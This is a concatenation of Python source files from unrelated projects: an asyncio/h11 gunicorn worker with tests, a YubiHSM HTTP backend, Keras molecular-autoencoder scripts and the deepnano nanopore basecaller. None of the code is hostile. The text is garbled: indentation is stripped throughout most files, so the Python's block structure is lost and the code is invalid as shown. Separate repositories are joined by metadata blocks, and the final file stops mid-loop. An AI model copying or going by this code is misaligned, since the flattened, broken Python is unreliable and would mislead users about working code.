'PATH_INFO': target.decode('utf8'),
'QUERY_STRING': query.decode('utf8') if query else '',
'REQUEST_METHOD': req.method.decode('ascii'),
'SCRIPT_NAME': os.environ.get('SCRIPT_NAME', ''),
'SERVER_NAME': sockname[0],
'SERVER_PORT': str(sockname[1]),
'SERVER_PROTOCOL': 'HTTP/%s' % req.http_version.decode('ascii'),
'wsgi.input': io.BytesIO(body),
'wsgi.url_scheme': 'https' if cfg.is_ssl else 'http',
})
for k, v in req.headers:
if k == b'host':
    environ['HOST'] = v.decode('ascii')
key = 'HTTP_' + k.decode('ascii').upper().replace('-', '_')
value = v.decode('ascii')
if key in environ:
    value = "%s,%s" % (environ[key], value)
environ[key] = value
return environ
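# Illustrative sketch (not part of the original module): for a request like
#   GET /search?q=1 HTTP/1.1
#   Host: example.com
# the function above yields, in addition to the gunicorn base keys, roughly:
#   environ['PATH_INFO'] == '/search'
#   environ['QUERY_STRING'] == 'q=1'
#   environ['REQUEST_METHOD'] == 'GET'
#   environ['HOST'] == environ['HTTP_HOST'] == 'example.com'
#   environ['SERVER_PROTOCOL'] == 'HTTP/1.1'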
class WSGIResponse:
def __init__(self, http, app, environ):
self.http = http
self.app = app
self.environ = environ
self.status = None
self.reason = None
self.headers = []
self.exc_info = None
self.buffer = []
async def process_request(self):
result = self.app(self.environ, self.start_response)
if result is not None:
self.buffer.extend(result)
res = h11.Response(
status_code=self.status,
reason=self.reason,
headers=self.headers,
)
await self.http.send(res)
for data in self.buffer:
await self.http.send(h11.Data(data=data))
await self.http.send(h11.EndOfMessage())
def start_response(self, status, headers, exc_info=None):
status, reason = status.split(' ', 1)
self.status = int(status)
self.reason = reason
self.exc_info = exc_info
self.headers.extend(headers)
return lambda data: self.buffer.append(data)
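# Minimal sketch of the WSGI contract driven above (hypothetical app, for
# illustration only):
#   def app(environ, start_response):
#       start_response('200 OK', [('Content-Type', 'text/plain')])
#       return [b'hello']
# process_request() collects the returned iterable into self.buffer and then
# replays it as h11 Response / Data / EndOfMessage events.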
class HTTPConnection:
_next_id = count()
def __init__(self, reader, writer):
self.reader = reader
self.writer = writer
self.conn = h11.Connection(h11.SERVER)
# Our Server: header
self.ident = " ".join([
"h11-example-curio-server/{}".format(h11.__version__),
h11.PRODUCT_ID,
]).encode("ascii")
# A unique id for this connection, to include in debugging output
# (useful for understanding what's going on if there are multiple
# simultaneous clients).
self._obj_id = next(HTTPConnection._next_id)
async def send(self, event):
# The code below doesn't send ConnectionClosed, so we don't bother
# handling it here either -- it would require that we do something
# appropriate when 'data' is None.
assert type(event) is not h11.ConnectionClosed
data = self.conn.send(event)
self.writer.write(data)
await self.writer.drain()
async def _read_from_peer(self):
if self.conn.they_are_waiting_for_100_continue:
self.info("Sending 100 Continue")
go_ahead = h11.InformationalResponse(
status_code=100,
headers=self.basic_headers())
await self.send(go_ahead)
try:
data = await self.reader.read()
except ConnectionError:
# They've stopped listening. Not much we can do about it here.
data = b""
self.conn.receive_data(data)
async def next_event(self):
while True:
event = self.conn.next_event()
if event is h11.NEED_DATA:
await self._read_from_peer()
continue
return event
def basic_headers(self):
# HTTP requires these headers in all responses (client would do
# something different here)
return [
("Date", format_date_time(None).encode("ascii")),
("Server", self.ident),
]
def info(self, *args):
# Little debugging method
print("{}:".format(self._obj_id), *args)
class AsyncioWorker(Worker):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.servers = []
self.sockname = None
def run(self):
loop = asyncio.get_event_loop()
loop.create_task(self.create_servers())
loop.run_forever()
def cleanup(self):
self.tmp.close()
async def create_servers(self):
for sock in self.sockets:
print(repr(sock))
def task_factory(sock):
sockname = sock.getsockname()
async def _inner(reader, writer):
await self.connection_task(sockname, reader, writer)
return _inner
server = await asyncio.start_server(task_factory(sock), sock=sock)
self.servers.append(server)
async def maybe_send_error_response(self, http, exc):
# If we can't send an error, oh well, nothing to be done
http.info("trying to send error response...")
if http.conn.our_state not in {h11.IDLE, h11.SEND_RESPONSE}:
http.info("...but I can't, because our state is",
http.conn.our_state)
return
try:
if isinstance(exc, h11.RemoteProtocolError):
status_code = exc.error_status_hint
else:
status_code = 500
body = str(exc).encode("utf-8")
http.info("Sending", status_code,
"response with", len(body), "bytes")
headers = http.basic_headers()
headers.append(("Content-Type", "text/plain; charset=utf-8"))
headers.append(("Content-Length", str(len(body))))
res = h11.Response(status_code=status_code, headers=headers)
await http.send(res)
await http.send(h11.Data(data=body))
await http.send(h11.EndOfMessage())
except Exception as exc:
http.info("error while sending error response:", exc)
async def respond_to_request(self, http, req, sockname):
http.info("Preparing echo response")
body = b''
while True:
event = await http.next_event()
if type(event) is h11.EndOfMessage:
break
assert type(event) is h11.Data
body += event.data
environ = environ_from_request(self.cfg, req, sockname, body)
app = self.app.wsgi()
wsgi_response = WSGIResponse(http, app, environ)
await wsgi_response.process_request()
async def connection_task(self, sockname, reader, writer):
print(repr(sockname))
http = HTTPConnection(reader, writer)
while True:
assert http.conn.states == {
h11.CLIENT: h11.IDLE, h11.SERVER: h11.IDLE}
try:
http.info("Server main loop waiting for request")
event = await http.next_event()
http.info("Server main loop got event:", event)
if type(event) is h11.Request:
await self.respond_to_request(http, event, sockname)
except Exception as exc:
import traceback
traceback.print_exc()
http.info("Error during response handler:", exc)
await self.maybe_send_error_response(http, exc)
if http.conn.our_state is h11.MUST_CLOSE:
http.info("connection is not reusable, so shutting down")
await writer.drain()
writer.close()
return
else:
try:
http.info("trying to re-use connection")
http.conn.start_next_cycle()
except h11.ProtocolError:
states = http.conn.states
http.info("unexpected state", states, "-- bailing out")
await self.maybe_send_error_response(
http,
RuntimeError("unexpected state {}".format(states)))
await writer.drain()
writer.close()
return
```
#### File: guvnor/tests/test_asyncio_worker.py
```python
import asyncio
import os
from gunicorn.config import Config
from guvnor.asyncio_worker import AsyncioWorker
from .support import (WSGITestRunner, run_worker, setup_function,
teardown_function)
def test_worker_creates_servers_for_sockets(monkeypatch, mocker):
loop = asyncio.get_event_loop()
calls = []
age = None
ppid = os.getpid()
sockets = [mocker.MagicMock(), mocker.MagicMock()]
app = None
timeout = None
cfg = Config()
log = None
async def start_server(*args, **kwargs):
calls.append((args, kwargs))
if len(calls) == len(sockets):
loop.stop()
monkeypatch.setattr(asyncio, 'start_server', start_server)
worker = AsyncioWorker(age, ppid, sockets, app, timeout, cfg, log)
run_worker(worker)
for call in calls:
assert call[1]['sock'] in sockets
def test_worker_passes_request_to_app():
request = b'GET / HTTP/1.1\r\nHost: localhost\r\nConnection: close\r\n\r\n'
runner = WSGITestRunner(request)
runner.run()
assert runner.wsgi.called
assert runner.wsgi.environ['REQUEST_METHOD'] == 'GET'
assert runner.wsgi.environ['SERVER_PROTOCOL'] == 'HTTP/1.1'
assert runner.wsgi.environ['HOST'] == 'localhost'
def test_worker_returns_response_to_socket():
request = b'GET / HTTP/1.1\r\nHost: localhost\r\nConnection: close\r\n\r\n'
response_body = b'hello'
runner = WSGITestRunner(request, response_headers=[
('Content-Type', 'text/plain'),
], response_body=[response_body])
runner.run()
assert runner.wsgi.called
print(repr(runner.writer.data))
assert b'200' in runner.writer.data
assert response_body in runner.writer.data
```
#### File: guvnor/tests/test_wsgi_url_handling.py
```python
import asyncio
import os
import urllib.parse
from gunicorn.config import Config
from guvnor.asyncio_worker import AsyncioWorker
from .support import (WSGITestRunner, run_worker, setup_function,
teardown_function)
def encode_path(path):
path = path.encode('utf8')
path = urllib.parse.quote_from_bytes(path)
return path.encode('ascii')
def path_test(path):
req = b'GET %s HTTP/1.1\r\nHost: localhost\r\nConnection: close\r\n\r\n'
runner = WSGITestRunner(req % path)
runner.run()
assert runner.wsgi.called
return runner
def test_basic_paths():
runner = path_test(encode_path('/'))
environ = runner.wsgi.environ
assert environ['PATH_INFO'] == '/'
assert environ['QUERY_STRING'] == ''
def test_simple_utf8_path():
expected_path = '/frobnitz™'
runner = path_test(encode_path(expected_path))
environ = runner.wsgi.environ
assert environ['PATH_INFO'] == expected_path
assert environ['QUERY_STRING'] == ''
def test_basic_query():
query = 'foo=bar&baz=qux'
runner = path_test(('/?' + query).encode('utf8'))
environ = runner.wsgi.environ
assert environ['QUERY_STRING'] == query
def test_encoded_basic_query():
query = 'foo=bar&baz=qux'
runner = path_test(encode_path('/?' + query))
environ = runner.wsgi.environ
assert environ['QUERY_STRING'] == query
def test_utf8_query():
query = 'foo=bar&baz=qux&utf8=✔'
runner = path_test(encode_path('/?' + query))
environ = runner.wsgi.environ
assert environ['QUERY_STRING'] == query
```
|
{
"source": "jeamland/python-yubihsm",
"score": 2
}
|
#### File: yubihsm/backends/http.py
```python
from __future__ import absolute_import
from ..exceptions import YubiHsmConnectionError
from requests.exceptions import RequestException
from six.moves.urllib import parse
import requests
class HttpBackend(object):
"""A backend for communicating with a YubiHSM connector over HTTP."""
def __init__(self, url='http://localhost:12345', timeout=None):
"""Constructs a new HttpBackend, connecting to the given URL.
The URL should be a http(s) URL to a running YubiHSM connector.
By default, the backend will attempt to connect to a connector running
locally, on the default port.
:param str url: (optional) The URL to connect to.
:param timeout: (optional) A timeout in seconds, or a tuple of two
values to use as connection timeout and request timeout.
:type timeout: int or tuple[int, int]
"""
self._url = parse.urljoin(url, '/connector/api')
self._timeout = timeout
self._session = requests.Session()
self._session.headers.update(
{'Content-Type': 'application/octet-stream'})
def transceive(self, msg):
"""Send a verbatim message."""
try:
resp = self._session.post(
url=self._url,
data=msg,
timeout=self._timeout
)
resp.raise_for_status()
return resp.content
except RequestException as e:
raise YubiHsmConnectionError(e)
def close(self):
self._session.close()
def __repr__(self):
return '{0.__class__.__name__}("{0._url}")'.format(self)
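# Usage sketch (assumes a YubiHSM connector listening on the default local port;
# the payload below is a placeholder, not a valid YubiHSM command):
#   backend = HttpBackend('http://localhost:12345', timeout=(5, 30))
#   raw_response = backend.transceive(b'\x00\x00')
#   backend.close()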
```
|
{
"source": "jeammimi/chem2",
"score": 2
}
|
#### File: jeammimi/chem2/sample_latent.py
```python
from __future__ import print_function
import argparse
import os, sys
import h5py
import numpy as np
from molecules.model import MoleculeVAE
from molecules.utils import one_hot_array, one_hot_index, from_one_hot_array, \
decode_smiles_from_indexes, load_dataset
from sklearn.manifold import TSNE
from sklearn.decomposition import PCA
from pylab import figure, axes, scatter, title, show
from rdkit import Chem
from rdkit.Chem import Draw
from keras.models import Sequential, Model, load_model
LATENT_DIM = 292
PCA_COMPONENTS = 50
TSNE_LEARNING_RATE = 750.0
TSNE_ITERATIONS = 1000
TSNE_COMPONENTS = 2
TSNE_PERPLEXITY = 30.0
def get_arguments():
parser = argparse.ArgumentParser(description='Molecular autoencoder network')
parser.add_argument('data', type=str, help='HDF5 file to read input data from.')
parser.add_argument('model', type=str, help='Trained Keras model to use.')
parser.add_argument('--save_h5', type=str, help='Name of a file to write HDF5 output to.')
parser.add_argument('--latent_dim', type=int, metavar='N', default=LATENT_DIM,
help='Dimensionality of the latent representation.')
parser.add_argument('--tsne_lr', metavar='LR', type=float, default=TSNE_LEARNING_RATE,
help='Learning to use for t-SNE.')
parser.add_argument('--tsne_components', metavar='N', type=int, default=TSNE_COMPONENTS,
help='Number of components to use for t-SNE.')
parser.add_argument('--tsne_perplexity', metavar='P', type=float, default=TSNE_PERPLEXITY)
parser.add_argument('--tsne_iterations', metavar='N', type=int, default=TSNE_ITERATIONS)
parser.add_argument('--visualize', dest='visualize', action='store_true',
help='Fit manifold and render a visualization. If this flag is not used, the sampled data' +
' will simply be returned with no further processing.')
parser.add_argument('--skip-pca', dest='use_pca', action='store_false',
help='Skip PCA preprocessing of data to feed into t-SNE.')
parser.add_argument('--pca_components', metavar='N', type=int, default=PCA_COMPONENTS,
help='Number of components to use for PCA.')
parser.set_defaults(use_pca = True)
parser.set_defaults(visualize = False)
return parser.parse_args()
def visualize_latent_rep(args, model, x_latent):
print("pca_on=%r pca_comp=%d tsne_comp=%d tsne_perplexity=%f tsne_lr=%f" % (
args.use_pca,
args.pca_components,
args.tsne_components,
args.tsne_perplexity,
args.tsne_lr
))
if args.use_pca:
pca = PCA(n_components = args.pca_components)
x_latent = pca.fit_transform(x_latent)
figure(figsize=(6, 6))
scatter(x_latent[:, 0], x_latent[:, 1], marker='.')
show()
tsne = TSNE(n_components = args.tsne_components,
perplexity = args.tsne_perplexity,
learning_rate = args.tsne_lr,
n_iter = args.tsne_iterations,
verbose = 4)
x_latent_proj = tsne.fit_transform(x_latent)
del x_latent
figure(figsize=(6, 6))
scatter(x_latent_proj[:, 0], x_latent_proj[:, 1], marker='.')
show()
def main():
args = get_arguments()
model = MoleculeVAE()
data, data_test, charset = load_dataset(args.data)
if os.path.isfile(args.model):
model.load(charset, args.model, latent_rep_size = args.latent_dim)
else:
raise ValueError("Model file %s doesn't exist" % args.model)
x_latent = model.encoder.predict(data)
if not args.visualize:
if not args.save_h5:
np.savetxt(sys.stdout, x_latent, delimiter = '\t')
else:
h5f = h5py.File(args.save_h5, 'w')
h5f.create_dataset('charset', data = charset)
h5f.create_dataset('latent_vectors', data = x_latent)
h5f.close()
else:
visualize_latent_rep(args, model, x_latent)
if __name__ == '__main__':
main()
```
|
{
"source": "jeammimi/chem",
"score": 2
}
|
#### File: chem/autoencoder/model.py
```python
from keras import backend as K
from keras import objectives
from keras.models import Model
from keras.layers import Input, Dense, Lambda
from keras.layers.core import Dense, Activation, Flatten, RepeatVector
from keras.layers.wrappers import TimeDistributed
from keras.layers.recurrent import GRU
from keras.layers.convolutional import Convolution1D
class MoleculeVAE():
autoencoder = None
def create(self,
charset,
max_length = 120,
epsilon_std = 0.01,
latent_rep_size = 292,
weights_file = None):
charset_length = len(charset)
x = Input(shape=(max_length, charset_length))
h = Convolution1D(9, 9, activation = 'relu')(x)
h = Convolution1D(9, 9, activation = 'relu')(h)
h = Convolution1D(10, 11, activation = 'relu')(h)
h = Flatten()(h)
h = Dense(435, activation = 'relu')(h)
z_mean = Dense(latent_rep_size, name='z_mean', activation = 'linear')(h)
z_log_var = Dense(latent_rep_size, name='z_log_var', activation = 'linear')(h)
def sampling(args):
z_mean, z_log_var = args
batch_size = K.shape(z_mean)[0]
epsilon = K.random_normal(shape=(batch_size, latent_rep_size), mean=0., std=epsilon_std)
return z_mean + K.exp(z_log_var / 2) * epsilon
def output_shape(args):
ms,vs = args
return ms
z = Lambda(sampling,output_shape)([z_mean, z_log_var])
h = Dense(latent_rep_size, name='latent_input', activation = 'relu')(z)
h = RepeatVector(max_length)(h)
h = GRU(501, return_sequences = True)(h)
h = GRU(501, return_sequences = True)(h)
h = GRU(501, return_sequences = True)(h)
decoded_mean = TimeDistributed(Dense(charset_length, activation='softmax'), name='decoded_mean')(h)
def vae_loss(x, x_decoded_mean):
x = K.flatten(x)
x_decoded_mean = K.flatten(x_decoded_mean)
xent_loss = max_length * objectives.binary_crossentropy(x, x_decoded_mean)
kl_loss = - 0.5 * K.mean(1 + z_log_var - K.square(z_mean) - K.exp(z_log_var), axis = -1)
return xent_loss + kl_loss
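# Note (explanatory, not in the original file): vae_loss is the usual VAE
# objective, i.e. a reconstruction term (binary cross-entropy, scaled by
# max_length because the tensors were flattened) plus the closed-form KL
# divergence to the unit Gaussian prior:
#   KL(N(mu, sigma^2) || N(0, 1)) = -0.5 * (1 + log(sigma^2) - mu^2 - sigma^2)
# averaged here over the latent dimensions.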
encoded_input = Input(shape=(max_length, latent_rep_size))
self.autoencoder = Model(x, decoded_mean)
self.encoder = Model(x, z_mean)
#self.decoder = Model(self.autoencoder.get_layer('z_mean'),
# self.autoencoder.get_layer('decoded_mean')(encoded_input))
if weights_file:
self.autoencoder.load_weights(weights_file)
self.autoencoder.compile(optimizer = 'Adam',
loss = vae_loss,
metrics = ['accuracy'])
def save(self, filename):
self.autoencoder.save_weights(filename)
def load(self, charset, weights_file, latent_rep_size = 292):
self.create(charset, weights_file = weights_file, latent_rep_size = latent_rep_size)
```
#### File: jeammimi/chem/download_chembl.py
```python
import argparse
import gzip
import pandas
import tempfile
import urllib
DEFAULT_URI = 'ftp://ftp.ebi.ac.uk/pub/databases/chembl/ChEMBLdb/latest/chembl_22_chemreps.txt.gz'
def get_arguments():
parser = argparse.ArgumentParser(description='Download ChEMBL entries and convert them to input for preprocessing')
parser.add_argument('--uri', type=str, default=DEFAULT_URI,
help = 'URI to download ChEMBL entries from')
parser.add_argument('--outfile', type=str, help='Output file name', default = 'chembl_smiles.h5')
return parser.parse_args()
def main():
args = get_arguments()
tfile = tempfile.NamedTemporaryFile()
fname = tfile.name
urllib.urlretrieve(args.uri, fname)
f = gzip.GzipFile(fname)
d = {}
for line in f.readlines()[1:]:
s = line.split()
i = int(s[0][6:])
d[i] = s[1]
keys = d.keys()
keys.sort()
frame = pandas.DataFrame(dict(structure=[d[key] for key in keys]))
frame.to_hdf(args.outfile, 'table')
if __name__ == '__main__':
main()
```
#### File: jeammimi/chem/train.py
```python
from __future__ import print_function
import argparse
import os
import h5py
import numpy as np
from autoencoder.model import MoleculeVAE
from autoencoder.utils import one_hot_array, one_hot_index, from_one_hot_array, \
decode_smiles_from_indexes, load_dataset
from keras.callbacks import ModelCheckpoint, ReduceLROnPlateau
NUM_EPOCHS = 1
BATCH_SIZE = 600
LATENT_DIM = 292
def get_arguments():
parser = argparse.ArgumentParser(description='Molecular autoencoder network')
parser.add_argument('data', type=str, help='The HDF5 file containing preprocessed data.')
parser.add_argument('model', type=str,
help='Where to save the trained model. If this file exists, it will be opened and resumed.')
parser.add_argument('--epochs', type=int, metavar='N', default=NUM_EPOCHS,
help='Number of epochs to run during training.')
parser.add_argument('--latent_dim', type=int, metavar='N', default=LATENT_DIM,
help='Dimensionality of the latent representation.')
parser.add_argument('--batch_size', type=int, metavar='N', default=BATCH_SIZE,
help='Number of samples to process per minibatch during training.')
return parser.parse_args()
def train(network, data_train, data_test, epochs, batch_size, callbacks=[], shuffle = True):
network.fit(data_train, data_train,
shuffle = shuffle,
nb_epoch = epochs,
batch_size = batch_size,
callbacks = callbacks,
validation_data = (data_test, data_test))
def main():
args = get_arguments()
data_train, data_test, charset = load_dataset(args.data)
model = MoleculeVAE()
if os.path.isfile(args.model):
model.load(charset, args.model, latent_rep_size = args.latent_dim)
else:
model.create(charset, latent_rep_size = args.latent_dim)
checkpointer = ModelCheckpoint(filepath = args.model,
verbose = 1,
save_best_only = True)
reduce_lr = ReduceLROnPlateau(monitor = 'val_loss',
factor = 0.2,
patience = 3,
min_lr = 0.0001)
train(model.autoencoder,
data_train,
data_test,
args.epochs,
args.batch_size,
callbacks = [checkpointer, reduce_lr])
if __name__ == '__main__':
main()
```
|
{
"source": "jeammimi/deepnano",
"score": 2
}
|
#### File: deepnano/r9/basecall.py
```python
from rnnf import Rnn
import h5py
import argparse
import os
import datetime
import sys
import time
import numpy as np
from extract_events import extract_events
def scale(X):
m25 = np.percentile(X[:,0], 25)
m75 = np.percentile(X[:,0], 75)
s50 = np.median(X[:,2])
me25 = 0.07499809
me75 = 0.26622871
se50 = 0.6103758
ret = np.array(X)
scale = (me75 - me25) / (m75 - m25)
m25 *= scale
shift = me25 - m25
ret[:,0] = X[:,0] * scale + shift
ret[:,1] = ret[:,0]**2
sscale = se50 / s50
ret[:,2] = X[:,2] * sscale
return ret
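# Note (explanatory, not in the original file): scale() normalises each read so
# that the 25th/75th percentiles of the event means and the median of the stdv
# column match fixed reference values (me25, me75, se50) the network was trained
# with, e.g. for the means:
#   scaled_mean = mean * (me75 - me25) / (m75 - m25) + (me25 - m25 * scale)
# and column 1 is then recomputed as the square of the scaled mean.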
def get_events(h5):
if not args.event_detect:
try:
e = h5["Analyses/Basecall_RNN_1D_000/BaseCalled_template/Events"]
return e
except:
pass
try:
e = h5["Analyses/Basecall_1D_000/BaseCalled_template/Events"]
return e
except:
pass
return extract_events(h5, args.chemistry)
def basecall(filename, output_file):
try:
h5 = h5py.File(filename, "r")
events = get_events(h5)
if events is None:
print "No events in file %s" % filename
h5.close()
return 0
if len(events) < 300:
print "Read %s too short, not basecalling" % filename
h5.close()
return 0
events = events[50:-50]
mean = events["mean"]
std = events["stdv"]
length = events["length"]
X = scale(np.array(np.vstack([mean, mean*mean, std, length]).T, dtype=np.float32))
o1, o2 = ntwk.predict(X)
o1m = (np.argmax(o1, 1))
o2m = (np.argmax(o2, 1))
om = np.vstack((o1m,o2m)).reshape((-1,),order='F')
output = "".join(map(lambda x: alph[x], om)).replace("N", "")
print >>output_file, ">%s_template_deepnano" % filename
print >>output_file, output
output_file.flush()
h5.close()
return len(events)
except Exception as e:
print "Read %s failed with %s" % (filename, e)
return 0
alph = "ACGTN"
parser = argparse.ArgumentParser()
parser.add_argument('--chemistry', choices=['r9', 'r9.4'], default='r9.4')
parser.add_argument('--output', type=str, default="output.fasta")
parser.add_argument('--directory', type=str, default='', help="Directory where read files are stored")
parser.add_argument('--watch', type=str, default='', help='Watched directory')
parser.add_argument('reads', type=str, nargs='*')
parser.add_argument('--debug', dest='debug', action='store_true')
parser.add_argument('--no-debug', dest='debug', action='store_false')
parser.add_argument('--event-detect', dest='event_detect', action='store_true')
parser.set_defaults(debug=False)
parser.set_defaults(event_detect=False)
args = parser.parse_args()
assert len(args.reads) != 0 or len(args.directory) != 0 or len(args.watch) != 0, "Nothing to basecall"
ntwks = {"r9": os.path.join("networks", "r9.pkl"), "r9.4": os.path.join("networks", "r94.pkl")}
ntwk = Rnn()
ntwk.load(ntwks[args.chemistry])
if len(args.reads) or len(args.directory) != 0:
fo = open(args.output, "w")
files = args.reads
if len(args.directory):
files += [os.path.join(args.directory, x) for x in os.listdir(args.directory)]
total_events = 0
start_time = datetime.datetime.now()
for i, read in enumerate(files):
current_events = basecall(read, fo)
if args.debug:
total_events += current_events
time_diff = (datetime.datetime.now() - start_time).seconds + 0.000001
print "Basecalled %d events in %f (%f ev/s)" % (total_events, time_diff, total_events / time_diff)
fo.close()
if len(args.watch) != 0:
try:
from watchdog.observers import Observer
from watchdog.events import PatternMatchingEventHandler
except ImportError:
print "Please install watchdog to watch directories"
sys.exit()
class Fast5Handler(PatternMatchingEventHandler):
"""Class for handling creation fo fast5-files"""
patterns = ["*.fast5"]
def on_created(self, event):
print "Calling", event
file_name = str(os.path.basename(event.src_path))
fasta_file_name = os.path.splitext(event.src_path)[0] + '.fasta'
with open(fasta_file_name, "w") as fo:
basecall(event.src_path, fo)
print('Watch dir: ' + args.watch)
observer = Observer()
print('Starting Observer')
# register the handler first, then start watching the directory for new fast5 files
observer.schedule(Fast5Handler(), path=args.watch)
observer.start()
try:
while True:
time.sleep(1)
# quit script using ctrl+c
except KeyboardInterrupt:
observer.stop()
observer.join()
```
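The `scale` helper above is a robust linear normalization: it maps the read's 25th/75th percentiles of the event means, and the median of the stdv column, onto fixed reference constants (presumably those of the training distribution). A minimal self-contained sketch of the same idea, reusing the constants hard-coded above:
```python
# Sketch only: percentile-matching normalization as in scale() above.
# The me25/me75/se50 constants are the ones hard-coded in basecall.py.
import numpy as np

def demo_scale(X, me25=0.07499809, me75=0.26622871, se50=0.6103758):
    m25, m75 = np.percentile(X[:, 0], [25, 75])
    s50 = np.median(X[:, 2])
    a = (me75 - me25) / (m75 - m25)   # slope matching the interquartile range
    b = me25 - m25 * a                # offset pinning the 25th percentile
    Y = np.array(X)
    Y[:, 0] = X[:, 0] * a + b
    Y[:, 1] = Y[:, 0] ** 2            # squared-mean feature, recomputed after scaling
    Y[:, 2] = X[:, 2] * (se50 / s50)  # stdv column matched by its median
    return Y

X = np.random.rand(1000, 4).astype(np.float32)
print(np.percentile(demo_scale(X)[:, 0], [25, 75]))  # ~[0.075, 0.266]
```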
#### File: deepnano/r9/rnnf.py
```python
import numpy as np
import pickle
def sigmoid(x):
return 1 / (1 + np.exp(-x))
class OutLayer:
def __init__(self):
self.n_params = 2
self.params = [None, None]
def calc(self, input):
otmp = np.dot(input, self.params[0]) + self.params[1]
e_x = np.exp(otmp - otmp.max(axis=1, keepdims=True))
return e_x / e_x.sum(axis=1, keepdims=True)
class SimpleLayer:
def __init__(self):
self.n_params = 10
self.params = [None for i in range(10)]
def calc(self, input):
# GRU-style recurrence; params[9] holds the initial hidden state
state = self.params[9]
output = np.zeros((len(input), self.params[2].shape[0]), dtype=np.float32)
for i in range(len(input)):
update_gate = sigmoid(np.dot(state, self.params[6]) +
np.dot(input[i], self.params[4]) +
self.params[8])
reset_gate = sigmoid(np.dot(state, self.params[5]) +
np.dot(input[i], self.params[3]) +
self.params[7])
new_val = np.tanh(np.dot(input[i], self.params[0]) +
reset_gate * np.dot(state, self.params[1]) +
self.params[2])
state = update_gate * state + (1 - update_gate) * new_val
output[i] = state
return np.array(output)
class BiSimpleLayer:
def __init__(self):
self.fwd = SimpleLayer()
self.bwd = SimpleLayer()
def calc(self, input):
return np.concatenate([self.fwd.calc(input), self.bwd.calc(input[::-1])[::-1]],
axis=1)
class Rnn:
def __init__(self):
pass
def predict(self, input):
l1 = self.layer1.calc(input)
l2 = self.layer2.calc(l1)
l3 = self.layer3.calc(l2)
return self.output1.calc(l3), self.output2.calc(l3)
def debug(self, input):
l1 = self.layer1.calc(input)
l2 = self.layer2.calc(l1)
l3 = self.layer3.calc(l2)
return l1, l2, l3
def load(self, fn):
with open(fn, "rb") as f:
self.layer1 = BiSimpleLayer()
for i in range(10):
self.layer1.fwd.params[i] = pickle.load(f)
for i in range(10):
self.layer1.bwd.params[i] = pickle.load(f)
self.layer2 = BiSimpleLayer()
for i in range(10):
self.layer2.fwd.params[i] = pickle.load(f)
for i in range(10):
self.layer2.bwd.params[i] = pickle.load(f)
self.layer3 = BiSimpleLayer()
for i in range(10):
self.layer3.fwd.params[i] = pickle.load(f)
for i in range(10):
self.layer3.bwd.params[i] = pickle.load(f)
self.output1 = OutLayer()
self.output2 = OutLayer()
for i in range(2):
self.output1.params[i] = pickle.load(f)
for i in range(2):
self.output2.params[i] = pickle.load(f)
```
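`Rnn` is a pure-NumPy re-implementation of the trained network: three bidirectional GRU layers feeding two softmax output heads whose argmaxes are interleaved in basecall.py. A minimal shape check of `SimpleLayer` with random weights, to document the parameter layout `calc` expects (the dimensions here are illustrative, not the shipped network's):
```python
# Shape check with random weights; dimensions are illustrative only.
import numpy as np
from rnnf import SimpleLayer  # the module defined above

n_in, n_hidden, T = 4, 8, 50
rng = np.random.RandomState(0)
layer = SimpleLayer()
layer.params = [rng.randn(n_in, n_hidden) * 0.1,      # 0: candidate W (input)
                rng.randn(n_hidden, n_hidden) * 0.1,  # 1: candidate U (recurrent)
                np.zeros(n_hidden),                   # 2: candidate bias
                rng.randn(n_in, n_hidden) * 0.1,      # 3: reset W (input)
                rng.randn(n_in, n_hidden) * 0.1,      # 4: update W (input)
                rng.randn(n_hidden, n_hidden) * 0.1,  # 5: reset U (recurrent)
                rng.randn(n_hidden, n_hidden) * 0.1,  # 6: update U (recurrent)
                np.zeros(n_hidden),                   # 7: reset bias
                np.zeros(n_hidden),                   # 8: update bias
                np.zeros(n_hidden)]                   # 9: initial hidden state
out = layer.calc(rng.randn(T, n_in).astype(np.float32))
print(out.shape)  # (50, 8): one hidden state per input step
```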
#### File: deepnano/training/prepare_dataset.py
```python
import argparse
import os
import h5py
from helpers import *
parser = argparse.ArgumentParser()
parser.add_argument('type', choices=['temp', 'comp', '2d'])
parser.add_argument('source_file', type=str)
parser.add_argument('root', type=str)
parser.add_argument('output_directory', type=str)
args = parser.parse_args()
finput = open(args.source_file)
for i, l in enumerate(finput):
parts = l.strip().split()
filename = ' '.join(parts[:-2])
ref = parts[-2]
sub = parts[-1]
h5 = h5py.File(args.root+"/"+filename, "r")
print h5["Raw"].keys()
# identity by default; when the substitution flag is set, T bases are rewritten as B
def t_to_b(model_state):
return model_state
if sub == "1":
def t_to_b(model_state):
return model_state.replace("T","B")
fo = open(os.path.join(args.output_directory, "%s.txt" % i), "w")
print >>fo, t_to_b(ref)
base_loc = get_base_loc(h5)
if args.type == 'temp':
#scale, scale_sd, shift, drift = extract_scaling(h5, "template", base_loc)
events = h5[base_loc+"/BaseCalled_%s/Events" % "template"]
index = 0.0
data = []
events = events[50:-50]
mean = events["mean"]
std = events["stdv"]
length = events["length"]
X = scale(np.array(np.vstack([mean, mean*mean, std, length]).T, dtype=np.float32))
for e,(mean,meansqr,std,length) in zip(events,X):
print >>fo, " ".join(map(str, [mean,meansqr,std,length])),
move = e["move"]
if move == 0:
print >>fo, "NN"
if move == 1:
print >>fo, "N%s" % t_to_b(e["model_state"][2])
if move == 2:
print >>fo, "%s%s" % (t_to_b(e["model_state"][1]), t_to_b(e["model_state"][2]))
if args.type == 'comp':
scale, scale_sd, shift, drift = extract_scaling(h5, "complement", base_loc)
events = h5[base_loc+"/BaseCalled_%s/Events" % "complement"]
index = 0.0
data = []
for e in events:
mean = (e["mean"] - shift) / scale
stdv = e["stdv"] / scale_sd
length = e["length"]
print >>fo, " ".join(map(str, preproc_event(mean, stdv, length))),
move = e["move"]
if move == 0:
print >>fo, "NN"
if move == 1:
print >>fo, "N%s" % t_to_b(e["model_state"][2])
if move == 2:
print >>fo, "%s%s" % (t_to_b(e["model_state"][1]), t_to_b(e["model_state"][2]))
if args.type == '2d':
tscale, tscale_sd, tshift, tdrift = extract_scaling(h5, "template", base_loc)
cscale, cscale_sd, cshift, cdrift = extract_scaling(h5, "complement", base_loc)
al = h5["Analyses/Basecall_2D_000/BaseCalled_2D/Alignment"]
temp_events = h5[base_loc+"/BaseCalled_template/Events"]
comp_events = h5[base_loc+"/BaseCalled_complement/Events"]
prev = None
for a in al:
ev = []
if a[0] == -1:
ev += [0, 0, 0, 0, 0]
else:
e = temp_events[a[0]]
mean = (e["mean"] - tshift) / cscale
stdv = e["stdv"] / tscale_sd
length = e["length"]
ev += [1] + preproc_event(mean, stdv, length)
if a[1] == -1:
ev += [0, 0, 0, 0, 0]
else:
